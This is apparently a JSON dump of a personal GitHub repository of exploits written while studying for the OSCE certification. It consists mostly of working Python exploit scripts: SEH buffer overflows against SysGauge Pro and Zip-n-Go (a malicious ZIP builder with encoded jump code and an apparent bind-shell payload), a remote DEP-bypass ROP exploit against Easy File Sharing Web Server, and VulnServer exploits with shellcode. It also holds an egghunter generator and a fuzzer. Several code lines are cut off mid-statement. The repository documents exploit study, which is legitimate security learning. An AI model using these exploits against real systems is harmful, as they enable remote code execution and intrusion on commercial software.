\n" }, { "path": "Local Buffer Overflow/SysGaugeProv4.6.12/Exploit.py", "content": "#!/usr/bin/python\n##################################################################################################################\n# Exploit Title : SysGauge Pro v4.6.12 - Local Buffer Overflow (SEH) #\n# Exploit Author : Hashim Jawad #\n# Twitter : @ihack4falafel #\n# Author Website : ihack4falafel[.]com #\n# Vendor Homepage : http://www.sysgauge.com/ #\n# Vulnerable Software : http://www.sysgauge.com/setups/sysgaugepro_setup_v4.6.12.exe #\n# Tested on : Windows XP Professional - SP3 #\n# Steps to reproduce : ~ Copy content of payload.txt #\n# ~ Under Register type in \"falafel\" in Customer Name field #\n# ~ Paste the content of payload.txt in Unlock Key field and click Register #\n##################################################################################################################\n\nimport struct\n\n# ***notes***\n# ~ this particular function [Register] of the program only accept characters [00-7f] excluding \"\\x00\\x09\\x0a\\x0d\"\n# ~ found two application dlls [QtGui4.dll] & [libdgg.dll] that have plenty of [pop, pop, ret] with clean address\n# ~ the following are Flexense products effected by the same vulnerability (note buffer size and offsets may vary)\n##################################################################################################################\n# ~ SysGauge Ultimate v4.6.12\n# ~ Azure DEX Pro v2.2.16\n# ~ Azure DEX Ultimate v2.2.16\n# ~ DiskBoss Pro v9.1.16\n# ~ DiskBoss Ultimate v9.1.16\n# ~ SyncBreeze Pro v10.7.14\n# ~ SyncBreeze Ultimate v10.7.14\n# ~ DiskPulse Pro v10.7.14\n# ~ DiskPulse Ultimate v10.7.14\n# ~ DiskSavvy Pro v10.7.14\n# ~ DiskSavvy Ultimate v10.7.14\n# ~ DiskSorter Pro v10.7.14\n# ~ DiskSorter Ultimate v10.7.14\n# ~ DupScout Pro v10.7.14\n# ~ DupScout Ultimate v10.7.14\n# ~ VX Search Pro v10.7.14\n# ~ VX Search Ultimate v10.7.14\n##################################################################################################################\n\n# overwrite SEH with clean address of [pop, pop, ret]\nbuffer = \"\\x41\" * 780 # junk to nSEH\nbuffer += \"\\x74\\x06\\x42\\x42\" # nSEH - jump if zero flag is set (always true)\nbuffer += struct.pack(' 2.0\r\nLocalFileHeader += '\\x00\\x00' # general purpose bit flag\r\nLocalFileHeader += '\\x00\\x00' # compression method\r\nLocalFileHeader += '\\xb7\\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nLocalFileHeader += '\\xce\\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nLocalFileHeader += '\\x00\\x00\\x00' # CRC-32 '\\x00' was left out to make sure we hit 25 bytes before file length\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # compressed size\r\nLocalFileHeader += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nLocalFileHeader += '\\xe4\\x0f' # file name length 0x0fe4 = 4068 bytes \r\nLocalFileHeader += '\\x00\\x00' # extra field length\r\nLocalFileHeader += '\\x00' # file name\r\n#LocalFileHeader += '\\x00' # extra filed \r\n################## Central Directory File Header ##################\r\nCDFileHeader = '\\x50\\x4b\\x01\\x02' # cd file header signature \r\nCDFileHeader += '\\x14\\x00' # version made by 0x14 = 20 -> 2.0\r\nCDFileHeader += '\\x14\\x00' # version needed to extract 0x14 = 20 -> 2.0\r\nCDFileHeader += '\\x00\\x00' # general purpose bit flag\r\nCDFileHeader += '\\x00\\x00' # compression method \r\nCDFileHeader += '\\xb7\\xac' # file last modification time 0xacb7 -> H=21 M=37 S=23 -> 21:37:23\r\nCDFileHeader += '\\xce\\x34' # file last modification date 0x34ce -> D=3 M=6 Y=2006 -> 2006/6/3\r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # CRC-32\r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # compressed size\r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # uncompressed size\r\nCDFileHeader += '\\xe4\\x0f' # file name length 0x0fe4 = 4068 bytes\r\nCDFileHeader += '\\x00\\x00' # extra field length\r\nCDFileHeader += '\\x00\\x00' # file comment length \r\nCDFileHeader += '\\x00\\x00' # disk number where file starts\r\nCDFileHeader += '\\x01\\x00' # internal file attributes BIT 0: apparent ASCII/text file\r\nCDFileHeader += '\\x24\\x00\\x00\\x00' # external file attributes \r\nCDFileHeader += '\\x00\\x00\\x00\\x00' # relative offset of local file header\r\n#CDFileHeader += '\\x00' # file name\r\n#CDFileHeader += '\\x00' # extra field \r\n#CDFileHeader += '\\x00' # file comment \r\n################ End of Central Directory Record ##################\r\nEOCDRHeader = '\\x50\\x4b\\x05\\x06' # End of central directory signature\r\nEOCDRHeader += '\\x00\\x00' # number of this disk \r\nEOCDRHeader += '\\x00\\x00' # disk where central directory starts \r\nEOCDRHeader += '\\x01\\x00' # number of central directory records on this disk \r\nEOCDRHeader += '\\x01\\x00' # total number of central directory records \r\nEOCDRHeader += '\\x12\\x10\\x00\\x00' # size of central directory 0x1012 = 4114 bytes\r\nEOCDRHeader += '\\x02\\x10\\x00\\x00' # offset of start of central directory, relative to start of archive \r\nEOCDRHeader += '\\x00\\x00' # comment length \r\n#EOCDRHeader += '\\x00' # comment \r\n \r\nWitchcraft = '\\x54' # PUSH ESP * save stack pointer\r\nWitchcraft += '\\x5F' # POP EDI\r\nWitchcraft += '\\x54' # PUSH ESP * calculate offset for decoder \r\nWitchcraft += '\\x58' # POP EAX\r\nWitchcraft += '\\x05\\x11\\x21\\x11\\x11' # ADD EAX,11112111\r\nWitchcraft += '\\x05\\x11\\x21\\x11\\x11' # ADD EAX,11112111\r\nWitchcraft += '\\x2D\\x53\\x25\\x22\\x22' # SUB EAX,22222553\r\nWitchcraft += '\\x50' # PUSH EAX\r\nWitchcraft += '\\x5C' # POP ESP\r\n\r\n#https://github.com/ihack4falafel/Slink\r\n#root@kali:/opt/Slink# python Slink.py * decode the following 'nop;mov esp, edi;mov eax, edi;add eax, 58c;jmp eax'\r\n#Enter your shellcode: 9089FC89F8058C050000FFE0\r\n#[+] Shellcode size is divisible by 4\r\n#[+] Encoding [e0ff0000]..\r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nWitchcraft += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and eax, 0x554e4d4a\r\nWitchcraft += \"\\x25\\x35\\x32\\x31\\x2A\" ## and eax, 0x2a313235\r\nWitchcraft += \"\\x05\\x11\\x11\\x77\\x61\" ## add eax, 0x61771111\r\nWitchcraft += \"\\x05\\x11\\x11\\x66\\x51\" ## add eax, 0x51661111\r\nWitchcraft += \"\\x05\\x11\\x11\\x55\\x61\" ## add eax, 0x61551111\r\nWitchcraft += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub eax, 0x33333333\r\nWitchcraft += \"\\x50\" ## push eax\r\n#[+] Encoding [058c05f8]..\r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nWitchcraft += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and eax, 0x554e4d4a\r\nWitchcraft += \"\\x25\\x35\\x32\\x31\\x2A\" ## and eax, 0x2a313235\r\nWitchcraft += \"\\x05\\x74\\x13\\x46\\x13\" ## add eax, 0x13461374\r\nWitchcraft += \"\\x05\\x64\\x13\\x45\\x13\" ## add eax, 0x13451364\r\nWitchcraft += \"\\x05\\x53\\x12\\x34\\x12\" ## add eax, 0x12341253\r\nWitchcraft += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub eax, 0x33333333\r\nWitchcraft += \"\\x50\" ## push eax\r\n#[+] Encoding [89fc8990]..\r\n#[!] [01] and/or [f] and/or [00] found, using alterantive encoder..\r\nWitchcraft += \"\\x25\\x4A\\x4D\\x4E\\x55\" ## and eax, 0x554e4d4a\r\nWitchcraft += \"\\x25\\x35\\x32\\x31\\x2A\" ## and eax, 0x2a313235\r\nWitchcraft += \"\\x05\\x41\\x44\\x76\\x44\" ## add eax, 0x44764441\r\nWitchcraft += \"\\x05\\x41\\x44\\x65\\x44\" ## add eax, 0x44654441\r\nWitchcraft += \"\\x05\\x41\\x34\\x54\\x34\" ## add eax, 0x34543441\r\nWitchcraft += \"\\x2D\\x33\\x33\\x33\\x33\" ## sub eax, 0x33333333\r\nWitchcraft += \"\\x50\" ## push eax\r\n\r\nEvil = '\\x41' * 3066 # offset to shellcode \r\nEvil += shellcode # bind shell \r\nEvil += '\\x43' * (716-len(shellcode)) # shellcode host\r\nEvil += Witchcraft # magic! \r\nEvil += '\\x42' * (126-len(Witchcraft)) # witchcraft host\r\nEvil += '\\x74\\x80\\x75\\x80' # nSEH - short jump backward (jump net)\r\nEvil += '\\x6e\\x4c\\x40\\x00' # SEH - pop ecx, pop ebp, retn in zip-n-go.exe \r\nEvil += '\\x41' * (4064-3908-4-4)\r\nEvil += '.txt'\r\n\r\nbuffer = LocalFileHeader\r\nbuffer += Evil\r\nbuffer += CDFileHeader\r\nbuffer += Evil\r\nbuffer += EOCDRHeader \r\n\r\ntry:\r\n\tf=open(\"Evil.zip\",\"w\")\r\n\tprint \"[+] Creating %s bytes evil payload..\" %len(Evil)\r\n\tf.write(buffer)\r\n\tf.close()\r\n\tprint \"[+] File created!\"\r\nexcept Exception as e:\r\n\tprint e" }, { "path": "Local Buffer Overflow/Zip-n-Gov4.9/README.md", "content": "### Zip-n-Go v4.9\nStructured Exception Handler (SEH) overwrite exploit found while studying about ZIP file headers. See the link [EDB-ID: 44828](https://www.exploit-db.com/exploits/44828/)\n\n

\n \n

\n" }, { "path": "README.md", "content": "# OSCE\nSome of the sploits and tools made during my joruney to take on OSCE. Mostly useless.. \n\n\n

\n \n

\n\n

\nWith persistence and patience comes success\n

\n" }, { "path": "Remote Buffer Overflow/EasyFileSharingWebServerv7.2/Exploit.py", "content": "#!/usr/bin/env python\n#---------------------------------------------------------------------------------------------------#\n# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #\n# Date : 04/24/2018 #\n# Exploit Author : Hashim Jawad #\n# Twitter : @ihack4falafel #\n# Author Website : ihack4falafel[.]com #\n# Vendor Homepage : http://www.sharing-file.com/ #\n# Software Link : http://www.sharing-file.com/efssetup.exe #\n# Original Exploit: https://www.exploit-db.com/exploits/44485/ #\n# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 # \n#---------------------------------------------------------------------------------------------------#\n\nimport requests\nimport struct\nimport time\n\nhost='192.168.80.148'\nport='80'\n\n# badchars = \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\"\n# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python\n# Payload size: 447 bytes\n\nshellcode = \"\"\nshellcode += \"\\x89\\xe3\\xd9\\xe5\\xd9\\x73\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\"\nshellcode += \"\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\"\nshellcode += \"\\x43\\x37\\x52\\x59\\x6a\\x41\\x58\\x50\\x30\\x41\\x30\\x41\"\nshellcode += \"\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\\x42\\x30\\x42\"\nshellcode += \"\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x49\"\nshellcode += \"\\x6c\\x6b\\x58\\x4e\\x62\\x63\\x30\\x57\\x70\\x77\\x70\\x53\"\nshellcode += \"\\x50\\x6e\\x69\\x6b\\x55\\x64\\x71\\x39\\x50\\x50\\x64\\x6e\"\nshellcode += \"\\x6b\\x42\\x70\\x64\\x70\\x6c\\x4b\\x43\\x62\\x36\\x6c\\x6e\"\nshellcode += \"\\x6b\\x43\\x62\\x75\\x44\\x6e\\x6b\\x52\\x52\\x64\\x68\\x46\"\nshellcode += \"\\x6f\\x38\\x37\\x50\\x4a\\x76\\x46\\x64\\x71\\x4b\\x4f\\x4e\"\nshellcode += \"\\x4c\\x77\\x4c\\x35\\x31\\x61\\x6c\\x77\\x72\\x76\\x4c\\x37\"\nshellcode += \"\\x50\\x4a\\x61\\x5a\\x6f\\x74\\x4d\\x37\\x71\\x39\\x57\\x38\"\nshellcode += \"\\x62\\x5a\\x52\\x30\\x52\\x66\\x37\\x6e\\x6b\\x50\\x52\\x62\"\nshellcode += \"\\x30\\x6c\\x4b\\x62\\x6a\\x57\\x4c\\x6c\\x4b\\x52\\x6c\\x47\"\nshellcode += \"\\x61\\x74\\x38\\x6d\\x33\\x71\\x58\\x43\\x31\\x38\\x51\\x50\"\nshellcode += \"\\x51\\x6c\\x4b\\x33\\x69\\x67\\x50\\x35\\x51\\x48\\x53\\x6e\"\nshellcode += \"\\x6b\\x57\\x39\\x75\\x48\\x69\\x73\\x54\\x7a\\x63\\x79\\x4e\"\nshellcode += \"\\x6b\\x35\\x64\\x6c\\x4b\\x35\\x51\\x6a\\x76\\x46\\x51\\x39\"\nshellcode += \"\\x6f\\x6e\\x4c\\x6f\\x31\\x48\\x4f\\x44\\x4d\\x36\\x61\\x48\"\nshellcode += \"\\x47\\x34\\x78\\x6b\\x50\\x74\\x35\\x69\\x66\\x73\\x33\\x73\"\nshellcode += \"\\x4d\\x49\\x68\\x55\\x6b\\x43\\x4d\\x47\\x54\\x74\\x35\\x68\"\nshellcode += \"\\x64\\x63\\x68\\x4e\\x6b\\x46\\x38\\x66\\x44\\x33\\x31\\x59\"\nshellcode += \"\\x43\\x61\\x76\\x6c\\x4b\\x66\\x6c\\x50\\x4b\\x4c\\x4b\\x50\"\nshellcode += \"\\x58\\x47\\x6c\\x65\\x51\\x69\\x43\\x6c\\x4b\\x63\\x34\\x6e\"\nshellcode += \"\\x6b\\x43\\x31\\x68\\x50\\x4e\\x69\\x61\\x54\\x65\\x74\\x65\"\nshellcode += \"\\x74\\x51\\x4b\\x51\\x4b\\x73\\x51\\x73\\x69\\x62\\x7a\\x42\"\nshellcode += \"\\x71\\x69\\x6f\\x39\\x70\\x51\\x4f\\x73\\x6f\\x43\\x6a\\x4e\"\nshellcode += \"\\x6b\\x52\\x32\\x78\\x6b\\x4e\\x6d\\x31\\x4d\\x53\\x5a\\x67\"\nshellcode += \"\\x71\\x6c\\x4d\\x4f\\x75\\x48\\x32\\x57\\x70\\x77\\x70\\x43\"\nshellcode += \"\\x30\\x66\\x30\\x61\\x78\\x46\\x51\\x6e\\x6b\\x70\\x6f\\x6e\"\nshellcode += \"\\x67\\x59\\x6f\\x6b\\x65\\x4f\\x4b\\x78\\x70\\x6d\\x65\\x39\"\nshellcode += \"\\x32\\x50\\x56\\x73\\x58\\x6c\\x66\\x6c\\x55\\x4d\\x6d\\x6d\"\nshellcode += \"\\x4d\\x49\\x6f\\x49\\x45\\x65\\x6c\\x45\\x56\\x73\\x4c\\x45\"\nshellcode += \"\\x5a\\x6b\\x30\\x6b\\x4b\\x39\\x70\\x53\\x45\\x34\\x45\\x4d\"\nshellcode += \"\\x6b\\x42\\x67\\x65\\x43\\x63\\x42\\x70\\x6f\\x50\\x6a\\x37\"\nshellcode += \"\\x70\\x66\\x33\\x6b\\x4f\\x69\\x45\\x30\\x63\\x35\\x31\\x72\"\nshellcode += \"\\x4c\\x65\\x33\\x76\\x4e\\x75\\x35\\x42\\x58\\x45\\x35\\x67\"\nshellcode += \"\\x70\\x41\\x41\"\n\n# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]\nbuffer = '\\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget)\n\n# mona.py VirtualProtect() ROP template with few modifications \n\n# ESI = ptr to VirtualProtect()\nbuffer += struct.pack('\n \n

\n" }, { "path": "Remote Buffer Overflow/VulnServer/CALL [REG]/Exploit.py", "content": "#!/usr/share/python\n\nimport struct\nimport time\nimport socket\nfrom pwn import *\n\ndef BufferOverflow():\n\n\t# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html\n\tshellcode = \"\"\n\tshellcode += \"\\x31\\xdb\\x64\\x8b\\x7b\\x30\\x8b\\x7f\"\n\tshellcode += \"\\x0c\\x8b\\x7f\\x1c\\x8b\\x47\\x08\\x8b\"\n\tshellcode += \"\\x77\\x20\\x8b\\x3f\\x80\\x7e\\x0c\\x33\"\n\tshellcode += \"\\x75\\xf2\\x89\\xc7\\x03\\x78\\x3c\\x8b\"\n\tshellcode += \"\\x57\\x78\\x01\\xc2\\x8b\\x7a\\x20\\x01\"\n\tshellcode += \"\\xc7\\x89\\xdd\\x8b\\x34\\xaf\\x01\\xc6\"\n\tshellcode += \"\\x45\\x81\\x3e\\x43\\x72\\x65\\x61\\x75\"\n\tshellcode += \"\\xf2\\x81\\x7e\\x08\\x6f\\x63\\x65\\x73\"\n\tshellcode += \"\\x75\\xe9\\x8b\\x7a\\x24\\x01\\xc7\\x66\"\n\tshellcode += \"\\x8b\\x2c\\x6f\\x8b\\x7a\\x1c\\x01\\xc7\"\n\tshellcode += \"\\x8b\\x7c\\xaf\\xfc\\x01\\xc7\\x89\\xd9\"\n\tshellcode += \"\\xb1\\xff\\x53\\xe2\\xfd\\x68\\x63\\x61\"\n\tshellcode += \"\\x6c\\x63\\x89\\xe2\\x52\\x52\\x53\\x53\"\n\tshellcode += \"\\x53\\x53\\x53\\x53\\x52\\x53\\xff\\xd7\"\n\n\t#----------------------------#\n\t# Payload #\n\t#----------------------------#\n\t# buffer = CMD + AAA padding # |---------------------------------------------------------+\n\t# buffer = EIP overwrite # |-------| WinXP SP3 Pro : \"\\xFF\\xE4\" | [essfunc.dll] |----|-+\n\t# buffer = NOP sled # |---------------------------------------------------------|-|-+\n\t# buffer = Shellcode # |---------------------------------------------------------|-|-|-+\n\t# buffer = BBB padding # |---------------------------------------------------------|-|-|-|-+\n\t#----------------------------# | | | | |\n\t# | | | | |\n\tbuffer = \"TRUN .\" + \"A\" * 2006 # <-----------------------------------+ | | | |\n\tbuffer += struct.pack('\n \n

\n" }, { "path": "Remote Buffer Overflow/VulnServer/POP POP RETN/Exploit.py", "content": "#!/usr/share/python\n\nimport struct\nimport time\nimport socket\nfrom pwn import *\n\ndef BufferOverflow():\n\n\t# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html\n\tshellcode = \"\"\n\tshellcode += \"\\x31\\xdb\\x64\\x8b\\x7b\\x30\\x8b\\x7f\"\n\tshellcode += \"\\x0c\\x8b\\x7f\\x1c\\x8b\\x47\\x08\\x8b\"\n\tshellcode += \"\\x77\\x20\\x8b\\x3f\\x80\\x7e\\x0c\\x33\"\n\tshellcode += \"\\x75\\xf2\\x89\\xc7\\x03\\x78\\x3c\\x8b\"\n\tshellcode += \"\\x57\\x78\\x01\\xc2\\x8b\\x7a\\x20\\x01\"\n\tshellcode += \"\\xc7\\x89\\xdd\\x8b\\x34\\xaf\\x01\\xc6\"\n\tshellcode += \"\\x45\\x81\\x3e\\x43\\x72\\x65\\x61\\x75\"\n\tshellcode += \"\\xf2\\x81\\x7e\\x08\\x6f\\x63\\x65\\x73\"\n\tshellcode += \"\\x75\\xe9\\x8b\\x7a\\x24\\x01\\xc7\\x66\"\n\tshellcode += \"\\x8b\\x2c\\x6f\\x8b\\x7a\\x1c\\x01\\xc7\"\n\tshellcode += \"\\x8b\\x7c\\xaf\\xfc\\x01\\xc7\\x89\\xd9\"\n\tshellcode += \"\\xb1\\xff\\x53\\xe2\\xfd\\x68\\x63\\x61\"\n\tshellcode += \"\\x6c\\x63\\x89\\xe2\\x52\\x52\\x53\\x53\"\n\tshellcode += \"\\x53\\x53\\x53\\x53\\x52\\x53\\xff\\xd7\"\n\n\t#----------------------------#\n\t# Payload #\n\t#----------------------------#\n\t# buffer = CMD + AAA padding # |-------------------------------------------------------------+\n\t# buffer = EIP overwrite # |---------| WinXP SP3 Pro [POP POP RETN]|[USER32.dll] |-------|-+\n\t# buffer = XXXXXXXX # |------------| Simulate the need for [POP POP RETN] |---------|-|-+\n\t# buffer = JMP ESP # |---------| WinXP SP3 Pro : [JMP ESP] | [essfunc.dll] |-------|-|-|-+\n\t# buffer = NOP sled # |-------------------------------------------------------------|-|-|-|-+\n\t# buffer = shellcode # |-------------------------------------------------------------|-|-|-|-|-+\n\t# buffer = BBB padding # |-------------------------------------------------------------|-|-|-|-|-|-+\n #----------------------------# | | | | | | |\n\t# | | | | | | |\n\tbuffer = \"TRUN .\" + \"A\" * 2006 # <-----------------------------------+ | | | | | |\n\tbuffer += struct.pack('\n \n

\n" }, { "path": "Remote Buffer Overflow/VulnServer/readme.md", "content": "### VulnServer\n\nVulnerServer is a purposly vulnerable server made so people like me can learn software exploitation. The subfolders contian all working exploits found in VulnerServer.\n\n![alt text](https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/PoC.JPG)\n" }, { "path": "Tools/EggHunter.py", "content": "#!/usr/bin/python\n\nimport binascii\nimport time\nimport sys\n\n# colors (*NIX systems only)\nW = '\\033[0m' # white\nR = '\\033[91m' # Light Red\nG = '\\033[32m' # green\nM = '\\033[95m' # Light magenta\n\n# the script takes user supplied egg as input and plug it to Skape's piece of art! the output (opcode) is debugger and binary file friendly.\n# Reference: \"Safely Searching Process Virtual Address Space\" skape 2004 http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf\n# 0: 66 81 ca ff 0f or dx,0xfff\n# 5: 42 inc edx\n# 6: 52 push edx\n# 7: 6a 02 push 0x2\n# 9: 58 pop eax\n# a: cd 2e int 0x2e\n# c: 3c 05 cmp al,0x5\n# e: 5a pop edx\n# f: 74 ef je 0x0\n# 11: b8 54 30 30 57 mov eax,0x57303054 egg = \"T00W\"\n# 16: 8b fa mov edi,edx\n# 18: af scas eax,DWORD PTR es:[edi]\n# 19: 75 ea jne 0x5\n# 1b: af scas eax,DWORD PTR es:[edi]\n# 1c: 75 e7 jne 0x5\n# 1e: ff e7 jmp edi \n\nif len(sys.argv) < 2:\n\t\tprint \"Usage: python EggHunter.py <\"+G+\"egg\"+W+\">\"\n\t\tsys.exit(0)\n\nInput = str(sys.argv[1])\nEgg = binascii.hexlify(Input)\nEgg = list(Egg)\nOpCode = Egg[6]+Egg[7]+Egg[4]+Egg[5]+Egg[2]+Egg[3]+Egg[0]+Egg[1]\nShellcode = \"\\\\x\"+Egg[6]+Egg[7]+\"\\\\x\"+Egg[4]+Egg[5]+\"\\\\x\"+Egg[2]+Egg[3]+\"\\\\x\"+Egg[0]+Egg[1]\nFinalOpcode = \"6681caff0f42526a0258cd2e3c055a74efb8\" +M+ OpCode +W+ \"8bfaaf75eaaf75e7ffe7\"\nFinalShellcode = \"'\\\\x66\\\\x81\\\\xca\\\\xff\\\\x0f\\\\x42\\\\x52\\\\x6a\\\\x02\\\\x58\\\\xcd\\\\x2e\\\\x3c\\\\x05\\\\x5a\\\\x74\\\\xef\\\\xb8\" +M+ Shellcode +W+ \"\\\\x8b\\\\xfa\\\\xaf\\\\x75\\\\xea\\\\xaf\\\\x75\\\\xe7\\\\xff\\\\xe7'\"\n\nprint \"[\"+G+\"+\"+W+\"] Egg Hunter shellcode with egg of '\"+M+Input+W+\"'..\"\ntime.sleep(1)\nprint R+\"Final Opcode \"+W+\": \" + FinalOpcode\nprint R+\"Final Shellcode \"+W+\": \" + FinalShellcode\n" }, { "path": "Tools/FuzzMe.py", "content": "#!/usr/share/python\n\nimport socket\nfrom pwn import *\nimport time\n\ndef Fuzzer():\n\n\tbuffer = [\"A\"]\n\tcounter = 500\n\twhile len(buffer) <= 100:\n\t\tbuffer.append(\"A\" * counter)\n\t\tcounter = counter + 500\n\ttry:\n\t\t# Used SLMail as template here, adjust accordingly!\n\t\tr = remote('192.168.199.140', 110)\n\t\tr.recv(2048)\n\n\t\tfor string in buffer:\n\t\t\tprint \"Fuzzing with %s bytes of payload\" %len(string)\n\t\t\tr.send('USER username\\r\\n')\n\t\t\tr.recv(2048)\n\t\t\tr.send('PASS ' + string + '\\r\\n')\n\t\t\tr.recv(2048)\n\t\t\ttime.sleep(1)\n\texcept:\n\t\tprint \"Couldn't connect to target, or you hit the jackpot!\"\n\n\ndef main():\n\n\tprint (\n\t'''\n\t _______ _______ _______ _______ _______ _______\n\t|\\ /|\\ /|\\ /|\\ /|\\ /|\\ /|\n\t| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n\t| | | | | | | | | | | | | | | | | | |\n\t| |F | | |u | | |z | | |z | | |M | | |e | |\n\t| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |\n\t|/_____\\|/_____\\|/_____\\|/_____\\|/_____\\|/_____\\|\n\tby @ihack4falafel\n\t'''\n\t)\n\n\tFuzzer()\n\nif __name__ == '__main__':\n\tmain()" } ]